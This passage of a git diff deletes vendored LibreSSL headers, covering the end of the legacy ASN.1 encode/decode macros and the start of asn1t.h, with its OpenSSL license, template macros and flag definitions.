-#define M_ASN1_D2I_get_seq_opt_type(type,r,func,free_func) \
-	if ((c.slen != 0) && (M_ASN1_next == (V_ASN1_UNIVERSAL| \
-		V_ASN1_CONSTRUCTED|V_ASN1_SEQUENCE)))\
-		{ M_ASN1_D2I_get_seq_type(type,r,func,free_func); }
-
-#define M_ASN1_D2I_get_IMP_set_type(type,r,func,free_func,x) \
-		M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,\
-			x,V_ASN1_CONTEXT_SPECIFIC);
-
-#define M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,a,b) \
-	c.q=c.p; \
-	if (d2i_ASN1_SET_OF_##type(&(r),&c.p,c.slen,func,\
-				   free_func,a,b) == NULL) \
-		{ c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-#define M_ASN1_D2I_get_set_strings(r,func,a,b) \
-	c.q=c.p; \
-	if (d2i_ASN1_STRING_SET(&(r),&c.p,c.slen,a,b) == NULL) \
-		{ c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-#define M_ASN1_D2I_get_EXP_opt(r,func,tag) \
-	if ((c.slen != 0L) && (M_ASN1_next == \
-		(V_ASN1_CONSTRUCTED|V_ASN1_CONTEXT_SPECIFIC|tag))) \
-		{ \
-		int Tinf,Ttag,Tclass; \
-		long Tlen; \
-		\
-		c.q=c.p; \
-		Tinf=ASN1_get_object(&c.p,&Tlen,&Ttag,&Tclass,c.slen); \
-		if (Tinf & 0x80) \
-			{ c.error=ERR_R_BAD_ASN1_OBJECT_HEADER; \
-			c.line=__LINE__; goto err; } \
-		if (Tinf == (V_ASN1_CONSTRUCTED+1)) \
-					Tlen = c.slen - (c.p - c.q) - 2; \
-		if (func(&(r),&c.p,Tlen) == NULL) \
-			{ c.line=__LINE__; goto err; } \
-		if (Tinf == (V_ASN1_CONSTRUCTED+1)) { \
-			Tlen = c.slen - (c.p - c.q); \
-			if(!ASN1_const_check_infinite_end(&c.p, Tlen)) \
-				{ c.error=ERR_R_MISSING_ASN1_EOS; \
-				c.line=__LINE__; goto err; } \
-		}\
-		c.slen-=(c.p-c.q); \
-		}
-
-#define M_ASN1_D2I_get_EXP_set_opt_type(type,r,func,free_func,tag,b) \
-	if ((c.slen != 0) && (M_ASN1_next == \
-		(V_ASN1_CONSTRUCTED|V_ASN1_CONTEXT_SPECIFIC|tag))) \
-		{ \
-		int Tinf,Ttag,Tclass; \
-		long Tlen; \
-		\
-		c.q=c.p; \
-		Tinf=ASN1_get_object(&c.p,&Tlen,&Ttag,&Tclass,c.slen); \
-		if (Tinf & 0x80) \
-			{ c.error=ERR_R_BAD_ASN1_OBJECT_HEADER; \
-			c.line=__LINE__; goto err; } \
-		if (Tinf == (V_ASN1_CONSTRUCTED+1)) \
-					Tlen = c.slen - (c.p - c.q) - 2; \
-		if (d2i_ASN1_SET_OF_##type(&(r),&c.p,Tlen,func, \
-			free_func,b,V_ASN1_UNIVERSAL) == NULL) \
-			{ c.line=__LINE__; goto err; } \
-		if (Tinf == (V_ASN1_CONSTRUCTED+1)) { \
-			Tlen = c.slen - (c.p - c.q); \
-			if(!ASN1_check_infinite_end(&c.p, Tlen)) \
-				{ c.error=ERR_R_MISSING_ASN1_EOS; \
-				c.line=__LINE__; goto err; } \
-		}\
-		c.slen-=(c.p-c.q); \
-		}
-
-/* BIG UGLY WARNING!  This is so damn ugly I wanna puke.  Unfortunately,
-   some macros that use ASN1_const_CTX still insist on writing in the input
-   stream.  ARGH!  ARGH!  ARGH!  Let's get rid of this macro package.
-   Please?						-- Richard Levitte */
-#define M_ASN1_next		(*((unsigned char *)(c.p)))
-#define M_ASN1_next_prev	(*((unsigned char *)(c.q)))
-
-/*************************************************/
-
-#define M_ASN1_I2D_vars(a)	int r=0,ret=0; \
-				unsigned char *p; \
-				if (a == NULL) return(0)
-
-/* Length Macros */
-#define M_ASN1_I2D_len(a,f)	ret+=f(a,NULL)
-#define M_ASN1_I2D_len_IMP_opt(a,f)	if (a != NULL) M_ASN1_I2D_len(a,f)
-
-#define M_ASN1_I2D_len_SET_type(type,a,f) \
-		ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,V_ASN1_SET, \
-					    V_ASN1_UNIVERSAL,IS_SET);
-
-#define M_ASN1_I2D_len_SEQUENCE_type(type,a,f) \
-		ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,V_ASN1_SEQUENCE, \
-					    V_ASN1_UNIVERSAL,IS_SEQUENCE)
-
-#define M_ASN1_I2D_len_SEQUENCE_opt(a,f) \
-		if ((a != NULL) && (sk_num(a) != 0)) \
-			M_ASN1_I2D_len_SEQUENCE(a,f);
-
-#define M_ASN1_I2D_len_SEQUENCE_opt_type(type,a,f) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			M_ASN1_I2D_len_SEQUENCE_type(type,a,f);
-
-#define M_ASN1_I2D_len_IMP_SET_type(type,a,f,x) \
-		ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
-					    V_ASN1_CONTEXT_SPECIFIC,IS_SET);
-
-#define M_ASN1_I2D_len_IMP_SET_opt_type(type,a,f,x) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
-					       V_ASN1_CONTEXT_SPECIFIC,IS_SET);
-
-#define M_ASN1_I2D_len_IMP_SEQUENCE_opt_type(type,a,f,x) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
-						    V_ASN1_CONTEXT_SPECIFIC, \
-						    IS_SEQUENCE);
-
-#define M_ASN1_I2D_len_EXP_opt(a,f,mtag,v) \
-		if (a != NULL)\
-			{ \
-			v=f(a,NULL); \
-			ret+=ASN1_object_size(1,v,mtag); \
-			}
-
-#define M_ASN1_I2D_len_EXP_SEQUENCE_opt_type(type,a,f,mtag,tag,v) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0))\
-			{ \
-			v=i2d_ASN1_SET_OF_##type(a,NULL,f,tag, \
-						 V_ASN1_UNIVERSAL, \
-						 IS_SEQUENCE); \
-			ret+=ASN1_object_size(1,v,mtag); \
-			}
-
-/* Put Macros */
-#define M_ASN1_I2D_put(a,f)	f(a,&p)
-
-#define M_ASN1_I2D_put_IMP_opt(a,f,t)	\
-		if (a != NULL) \
-			{ \
-			unsigned char *q=p; \
-			f(a,&p); \
-			*q=(V_ASN1_CONTEXT_SPECIFIC|t|(*q&V_ASN1_CONSTRUCTED));\
-			}
-
-#define M_ASN1_I2D_put_SET_type(type,a,f) \
-     i2d_ASN1_SET_OF_##type(a,&p,f,V_ASN1_SET,V_ASN1_UNIVERSAL,IS_SET)
-#define M_ASN1_I2D_put_IMP_SET_type(type,a,f,x) \
-     i2d_ASN1_SET_OF_##type(a,&p,f,x,V_ASN1_CONTEXT_SPECIFIC,IS_SET)
-
-#define M_ASN1_I2D_put_SEQUENCE_type(type,a,f) \
-     i2d_ASN1_SET_OF_##type(a,&p,f,V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL, \
-			    IS_SEQUENCE)
-
-#define M_ASN1_I2D_put_SEQUENCE_opt(a,f) \
-		if ((a != NULL) && (sk_num(a) != 0)) \
-			M_ASN1_I2D_put_SEQUENCE(a,f);
-
-#define M_ASN1_I2D_put_IMP_SET_opt_type(type,a,f,x) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			{ i2d_ASN1_SET_OF_##type(a,&p,f,x, \
-						 V_ASN1_CONTEXT_SPECIFIC, \
-						 IS_SET); }
-
-#define M_ASN1_I2D_put_IMP_SEQUENCE_opt_type(type,a,f,x) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			{ i2d_ASN1_SET_OF_##type(a,&p,f,x, \
-						 V_ASN1_CONTEXT_SPECIFIC, \
-						 IS_SEQUENCE); }
-
-#define M_ASN1_I2D_put_EXP_opt(a,f,tag,v) \
-		if (a != NULL) \
-			{ \
-			ASN1_put_object(&p,1,v,tag,V_ASN1_CONTEXT_SPECIFIC); \
-			f(a,&p); \
-			}
-
-#define M_ASN1_I2D_put_EXP_SEQUENCE_opt_type(type,a,f,mtag,tag,v) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			{ \
-			ASN1_put_object(&p,1,v,mtag,V_ASN1_CONTEXT_SPECIFIC); \
-			i2d_ASN1_SET_OF_##type(a,&p,f,tag,V_ASN1_UNIVERSAL, \
-					       IS_SEQUENCE); \
-			}
-
-#define M_ASN1_I2D_seq_total() \
-		r=ASN1_object_size(1,ret,V_ASN1_SEQUENCE); \
-		if (pp == NULL) return(r); \
-		p= *pp; \
-		ASN1_put_object(&p,1,ret,V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL)
-
-#define M_ASN1_I2D_INF_seq_start(tag,ctx) \
-		*(p++)=(V_ASN1_CONSTRUCTED|(tag)|(ctx)); \
-		*(p++)=0x80
-
-#define M_ASN1_I2D_INF_seq_end() *(p++)=0x00; *(p++)=0x00
-
-#define M_ASN1_I2D_finish()	*pp=p; \
-				return(r);
-
-int asn1_GetSequence(ASN1_const_CTX *c, long *length);
-void asn1_add_error(const unsigned char *address, int offset);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/asn1t.h b/thirdparty/libressl/include/openssl/asn1t.h
deleted file mode 100644
index ba380bd..0000000
--- a/thirdparty/libressl/include/openssl/asn1t.h
+++ /dev/null
@@ -1,880 +0,0 @@
-/* $OpenBSD: asn1t.h,v 1.14 2016/12/27 15:12:51 jsing Exp $ */
-/* Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
- * project 2000.
- */
-/* ====================================================================
- * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-#ifndef HEADER_ASN1T_H
-#define HEADER_ASN1T_H
-
-#include <stddef.h>
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/asn1.h>
-
-/* ASN1 template defines, structures and functions */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Macro to obtain ASN1_ADB pointer from a type (only used internally) */
-#define ASN1_ADB_ptr(iptr) ((const ASN1_ADB *)(iptr))
-
-
-/* Macros for start and end of ASN1_ITEM definition */
-
-#define ASN1_ITEM_start(itname) \
-	const ASN1_ITEM itname##_it = {
-
-#define ASN1_ITEM_end(itname) \
-		};
-
-
-
-/* Macros to aid ASN1 template writing */
-
-#define ASN1_ITEM_TEMPLATE(tname) \
-	static const ASN1_TEMPLATE tname##_item_tt 
-
-#define ASN1_ITEM_TEMPLATE_END(tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_PRIMITIVE,\
-		-1,\
-		&tname##_item_tt,\
-		0,\
-		NULL,\
-		0,\
-		#tname \
-	ASN1_ITEM_end(tname)
-
-
-/* This is a ASN1 type which just embeds a template */
- 
-/* This pair helps declare a SEQUENCE. We can do:
- *
- * 	ASN1_SEQUENCE(stname) = {
- * 		... SEQUENCE components ...
- * 	} ASN1_SEQUENCE_END(stname)
- *
- * 	This will produce an ASN1_ITEM called stname_it
- *	for a structure called stname.
- *
- * 	If you want the same structure but a different
- *	name then use:
- *
- * 	ASN1_SEQUENCE(itname) = {
- * 		... SEQUENCE components ...
- * 	} ASN1_SEQUENCE_END_name(stname, itname)
- *
- *	This will create an item called itname_it using
- *	a structure called stname.
- */
-
-#define ASN1_SEQUENCE(tname) \
-	static const ASN1_TEMPLATE tname##_seq_tt[] 
-
-#define ASN1_SEQUENCE_END(stname) ASN1_SEQUENCE_END_name(stname, stname)
-
-#define ASN1_SEQUENCE_END_name(stname, tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_SEQUENCE,\
-		V_ASN1_SEQUENCE,\
-		tname##_seq_tt,\
-		sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
-		NULL,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-#define ASN1_NDEF_SEQUENCE(tname) \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_NDEF_SEQUENCE_cb(tname, cb) \
-	ASN1_SEQUENCE_cb(tname, cb)
-
-#define ASN1_SEQUENCE_cb(tname, cb) \
-	static const ASN1_AUX tname##_aux = {NULL, 0, 0, 0, cb, 0}; \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_BROKEN_SEQUENCE(tname) \
-	static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_BROKEN, 0, 0, 0, 0}; \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_SEQUENCE_ref(tname, cb, lck) \
-	static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_REFCOUNT, offsetof(tname, references), lck, cb, 0}; \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_SEQUENCE_enc(tname, enc, cb) \
-	static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_ENCODING, 0, 0, cb, offsetof(tname, enc)}; \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_NDEF_SEQUENCE_END(tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_NDEF_SEQUENCE,\
-		V_ASN1_SEQUENCE,\
-		tname##_seq_tt,\
-		sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
-		NULL,\
-		sizeof(tname),\
-		#tname \
-	ASN1_ITEM_end(tname)
-
-#define ASN1_BROKEN_SEQUENCE_END(stname) ASN1_SEQUENCE_END_ref(stname, stname)
-
-#define ASN1_SEQUENCE_END_enc(stname, tname) ASN1_SEQUENCE_END_ref(stname, tname)
-
-#define ASN1_SEQUENCE_END_cb(stname, tname) ASN1_SEQUENCE_END_ref(stname, tname)
-
-#define ASN1_SEQUENCE_END_ref(stname, tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_SEQUENCE,\
-		V_ASN1_SEQUENCE,\
-		tname##_seq_tt,\
-		sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
-		&tname##_aux,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-#define ASN1_NDEF_SEQUENCE_END_cb(stname, tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_NDEF_SEQUENCE,\
-		V_ASN1_SEQUENCE,\
-		tname##_seq_tt,\
-		sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
-		&tname##_aux,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-
-/* This pair helps declare a CHOICE type. We can do:
- *
- * 	ASN1_CHOICE(chname) = {
- * 		... CHOICE options ...
- * 	ASN1_CHOICE_END(chname)
- *
- * 	This will produce an ASN1_ITEM called chname_it
- *	for a structure called chname. The structure
- *	definition must look like this:
- *	typedef struct {
- *		int type;
- *		union {
- *			ASN1_SOMETHING *opt1;
- *			ASN1_SOMEOTHER *opt2;
- *		} value;
- *	} chname;
- *	
- *	the name of the selector must be 'type'.
- * 	to use an alternative selector name use the
- *      ASN1_CHOICE_END_selector() version.
- */
-
-#define ASN1_CHOICE(tname) \
-	static const ASN1_TEMPLATE tname##_ch_tt[] 
-
-#define ASN1_CHOICE_cb(tname, cb) \
-	static const ASN1_AUX tname##_aux = {NULL, 0, 0, 0, cb, 0}; \
-	ASN1_CHOICE(tname)
-
-#define ASN1_CHOICE_END(stname) ASN1_CHOICE_END_name(stname, stname)
-
-#define ASN1_CHOICE_END_name(stname, tname) ASN1_CHOICE_END_selector(stname, tname, type)
-
-#define ASN1_CHOICE_END_selector(stname, tname, selname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_CHOICE,\
-		offsetof(stname,selname) ,\
-		tname##_ch_tt,\
-		sizeof(tname##_ch_tt) / sizeof(ASN1_TEMPLATE),\
-		NULL,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-#define ASN1_CHOICE_END_cb(stname, tname, selname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_CHOICE,\
-		offsetof(stname,selname) ,\
-		tname##_ch_tt,\
-		sizeof(tname##_ch_tt) / sizeof(ASN1_TEMPLATE),\
-		&tname##_aux,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-/* This helps with the template wrapper form of ASN1_ITEM */
-
-#define ASN1_EX_TEMPLATE_TYPE(flags, tag, name, type) { \
-	(flags), (tag), 0,\
-	#name, ASN1_ITEM_ref(type) }
-
-/* These help with SEQUENCE or CHOICE components */
-
-/* used to declare other types */
-
-#define ASN1_EX_TYPE(flags, tag, stname, field, type) { \
-	(flags), (tag), offsetof(stname, field),\
-	#field, ASN1_ITEM_ref(type) }
-
-/* used when the structure is combined with the parent */
-
-#define ASN1_EX_COMBINE(flags, tag, type) { \
-	(flags)|ASN1_TFLG_COMBINE, (tag), 0, NULL, ASN1_ITEM_ref(type) }
-
-/* implicit and explicit helper macros */
-
-#define ASN1_IMP_EX(stname, field, type, tag, ex) \
-		ASN1_EX_TYPE(ASN1_TFLG_IMPLICIT | ex, tag, stname, field, type)
-
-#define ASN1_EXP_EX(stname, field, type, tag, ex) \
-		ASN1_EX_TYPE(ASN1_TFLG_EXPLICIT | ex, tag, stname, field, type)
-
-/* Any defined by macros: the field used is in the table itself */
-
-#define ASN1_ADB_OBJECT(tblname) { ASN1_TFLG_ADB_OID, -1, 0, #tblname, (const ASN1_ITEM *)&(tblname##_adb) }
-#define ASN1_ADB_INTEGER(tblname) { ASN1_TFLG_ADB_INT, -1, 0, #tblname, (const ASN1_ITEM *)&(tblname##_adb) }
-/* Plain simple type */
-#define ASN1_SIMPLE(stname, field, type) ASN1_EX_TYPE(0,0, stname, field, type)
-
-/* OPTIONAL simple type */
-#define ASN1_OPT(stname, field, type) ASN1_EX_TYPE(ASN1_TFLG_OPTIONAL, 0, stname, field, type)
-
-/* IMPLICIT tagged simple type */
-#define ASN1_IMP(stname, field, type, tag) ASN1_IMP_EX(stname, field, type, tag, 0)
-
-/* IMPLICIT tagged OPTIONAL simple type */
-#define ASN1_IMP_OPT(stname, field, type, tag) ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL)
-
-/* Same as above but EXPLICIT */
-
-#define ASN1_EXP(stname, field, type, tag) ASN1_EXP_EX(stname, field, type, tag, 0)
-#define ASN1_EXP_OPT(stname, field, type, tag) ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL)
-
-/* SEQUENCE OF type */
-#define ASN1_SEQUENCE_OF(stname, field, type) \
-		ASN1_EX_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, stname, field, type)
-
-/* OPTIONAL SEQUENCE OF */
-#define ASN1_SEQUENCE_OF_OPT(stname, field, type) \
-		ASN1_EX_TYPE(ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL, 0, stname, field, type)
-
-/* Same as above but for SET OF */
-
-#define ASN1_SET_OF(stname, field, type) \
-		ASN1_EX_TYPE(ASN1_TFLG_SET_OF, 0, stname, field, type)
-
-#define ASN1_SET_OF_OPT(stname, field, type) \
-		ASN1_EX_TYPE(ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL, 0, stname, field, type)
-
-/* Finally compound types of SEQUENCE, SET, IMPLICIT, EXPLICIT and OPTIONAL */
-
-#define ASN1_IMP_SET_OF(stname, field, type, tag) \
-			ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF)
-
-#define ASN1_EXP_SET_OF(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF)
-
-#define ASN1_IMP_SET_OF_OPT(stname, field, type, tag) \
-			ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL)
-
-#define ASN1_EXP_SET_OF_OPT(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL)
-
-#define ASN1_IMP_SEQUENCE_OF(stname, field, type, tag) \
-			ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF)
-
-#define ASN1_IMP_SEQUENCE_OF_OPT(stname, field, type, tag) \
-			ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL)
-
-#define ASN1_EXP_SEQUENCE_OF(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF)
-
-#define ASN1_EXP_SEQUENCE_OF_OPT(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL)
-
-/* EXPLICIT using indefinite length constructed form */
-#define ASN1_NDEF_EXP(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_NDEF)
-
-/* EXPLICIT OPTIONAL using indefinite length constructed form */
-#define ASN1_NDEF_EXP_OPT(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL|ASN1_TFLG_NDEF)
-
-/* Macros for the ASN1_ADB structure */
-
-#define ASN1_ADB(name) \
-	static const ASN1_ADB_TABLE name##_adbtbl[] 
-
-
-#define ASN1_ADB_END(name, flags, field, app_table, def, none) \
-	;\
-	static const ASN1_ADB name##_adb = {\
-		flags,\
-		offsetof(name, field),\
-		app_table,\
-		name##_adbtbl,\
-		sizeof(name##_adbtbl) / sizeof(ASN1_ADB_TABLE),\
-		def,\
-		none\
-	}
-
-
-#define ADB_ENTRY(val, template) {val, template}
-
-#define ASN1_ADB_TEMPLATE(name) \
-	static const ASN1_TEMPLATE name##_tt 
-
-#endif /* !LIBRESSL_INTERNAL */
-
-/* This is the ASN1 template structure that defines
- * a wrapper round the actual type. It determines the
- * actual position of the field in the value structure,
- * various flags such as OPTIONAL and the field name.
- */
-
-struct ASN1_TEMPLATE_st {
-unsigned long flags;		/* Various flags */
-long tag;			/* tag, not used if no tagging */
-unsigned long offset;		/* Offset of this field in structure */
-#ifndef NO_ASN1_FIELD_NAMES
-const char *field_name;		/* Field name */
-#endif
-ASN1_ITEM_EXP *item;		/* Relevant ASN1_ITEM or ASN1_ADB */
-};
-
-/* Macro to extract ASN1_ITEM and ASN1_ADB pointer from ASN1_TEMPLATE */
-
-#define ASN1_TEMPLATE_item(t) (t->item_ptr)
-#define ASN1_TEMPLATE_adb(t) (t->item_ptr)
-
-typedef struct ASN1_ADB_TABLE_st ASN1_ADB_TABLE;
-typedef struct ASN1_ADB_st ASN1_ADB;
-
-struct ASN1_ADB_st {
-	unsigned long flags;	/* Various flags */
-	unsigned long offset;	/* Offset of selector field */
-	STACK_OF(ASN1_ADB_TABLE) **app_items; /* Application defined items */
-	const ASN1_ADB_TABLE *tbl;	/* Table of possible types */
-	long tblcount;		/* Number of entries in tbl */
-	const ASN1_TEMPLATE *default_tt;  /* Type to use if no match */
-	const ASN1_TEMPLATE *null_tt;  /* Type to use if selector is NULL */
-};
-
-struct ASN1_ADB_TABLE_st {
-	long value;		/* NID for an object or value for an int */
-	const ASN1_TEMPLATE tt;		/* item for this value */
-};
-
-/* template flags */
-
-/* Field is optional */
-#define ASN1_TFLG_OPTIONAL	(0x1)
-
-/* Field is a SET OF */
-#define ASN1_TFLG_SET_OF	(0x1 << 1)
-
-/* Field is a SEQUENCE OF */
-#define ASN1_TFLG_SEQUENCE_OF	(0x2 << 1)
-
-/* Special case: this refers to a SET OF that
- * will be sorted into DER order when encoded *and*
- * the corresponding STACK will be modified to match
- * the new order.
- */
-#define ASN1_TFLG_SET_ORDER	(0x3 << 1)
-
-/* Mask for SET OF or SEQUENCE OF */
-#define ASN1_TFLG_SK_MASK	(0x3 << 1)
-
-/* These flags mean the tag should be taken from the
- * tag field. If EXPLICIT then the underlying type
- * is used for the inner tag.
- */
-
-/* IMPLICIT tagging */
-#define ASN1_TFLG_IMPTAG	(0x1 << 3)
-
-
-/* EXPLICIT tagging, inner tag from underlying type */
-#define ASN1_TFLG_EXPTAG	(0x2 << 3)
-
-#define ASN1_TFLG_TAG_MASK	(0x3 << 3)
-
-/* context specific IMPLICIT */
-#define ASN1_TFLG_IMPLICIT	ASN1_TFLG_IMPTAG|ASN1_TFLG_CONTEXT
-
-/* context specific EXPLICIT */
-#define ASN1_TFLG_EXPLICIT	ASN1_TFLG_EXPTAG|ASN1_TFLG_CONTEXT
-
-/* If tagging is in force these determine the
- * type of tag to use. Otherwise the tag is
- * determined by the underlying type. These 
- * values reflect the actual octet format.
- */
-
-/* Universal tag */ 
-#define ASN1_TFLG_UNIVERSAL	(0x0<<6)
-/* Application tag */ 
-#define ASN1_TFLG_APPLICATION	(0x1<<6)
-/* Context specific tag */ 
-#define ASN1_TFLG_CONTEXT	(0x2<<6)
-/* Private tag */ 
-#define ASN1_TFLG_PRIVATE	(0x3<<6)
-
-#define ASN1_TFLG_TAG_CLASS	(0x3<<6)
-
-/* These are for ANY DEFINED BY type. In this case
- * the 'item' field points to an ASN1_ADB structure
- * which contains a table of values to decode the
- * relevant type
- */
-
-#define ASN1_TFLG_ADB_MASK	(0x3<<8)
-
-#define ASN1_TFLG_ADB_OID	(0x1<<8)
-
-#define ASN1_TFLG_ADB_INT	(0x1<<9)
-
-/* This flag means a parent structure is passed
- * instead of the field: this is useful is a
- * SEQUENCE is being combined with a CHOICE for
- * example. Since this means the structure and
- * item name will differ we need to use the
- * ASN1_CHOICE_END_name() macro for example.
- */
-
-#define ASN1_TFLG_COMBINE	(0x1<<10)
-
-/* This flag when present in a SEQUENCE OF, SET OF
- * or EXPLICIT causes indefinite length constructed
- * encoding to be used if required.
- */
-
-#define ASN1_TFLG_NDEF		(0x1<<11)
-
-/* This is the actual ASN1 item itself */
-
-struct ASN1_ITEM_st {
-char itype;			/* The item type, primitive, SEQUENCE, CHOICE or extern */
-long utype;			/* underlying type */
-const ASN1_TEMPLATE *templates;	/* If SEQUENCE or CHOICE this contains the contents */
-long tcount;			/* Number of templates if SEQUENCE or CHOICE */
-const void *funcs;		/* functions that handle this type */
-long size;			/* Structure size (usually)*/
-#ifndef NO_ASN1_FIELD_NAMES
-const char *sname;		/* Structure name */
-#endif
-};
-
-/* These are values for the itype field and
- * determine how the type is interpreted.
- *
- * For PRIMITIVE types the underlying type
- * determines the behaviour if items is NULL.
- *
- * Otherwise templates must contain a single 
- * template and the type is treated in the
- * same way as the type specified in the template.
- *
- * For SEQUENCE types the templates field points
- * to the members, the size field is the
- * structure size.
- *
- * For CHOICE types the templates field points
- * to each possible member (typically a union)
- * and the 'size' field is the offset of the
- * selector.
- *
- * The 'funcs' field is used for application
- * specific functions. 
- *
- * The EXTERN type uses a new style d2i/i2d.
- * The new style should be used where possible
- * because it avoids things like the d2i IMPLICIT
- * hack.
- *
- * MSTRING is a multiple string type, it is used
- * for a CHOICE of character strings where the
- * actual strings all occupy an ASN1_STRING
- * structure. In this case the 'utype' field
- * has a special meaning, it is used as a mask
- * of acceptable types using the B_ASN1 constants.
- *
- * NDEF_SEQUENCE is the same as SEQUENCE except
- * that it will use indefinite length constructed
- * encoding if requested.
- *
- */
-
-#define ASN1_ITYPE_PRIMITIVE		0x0
-
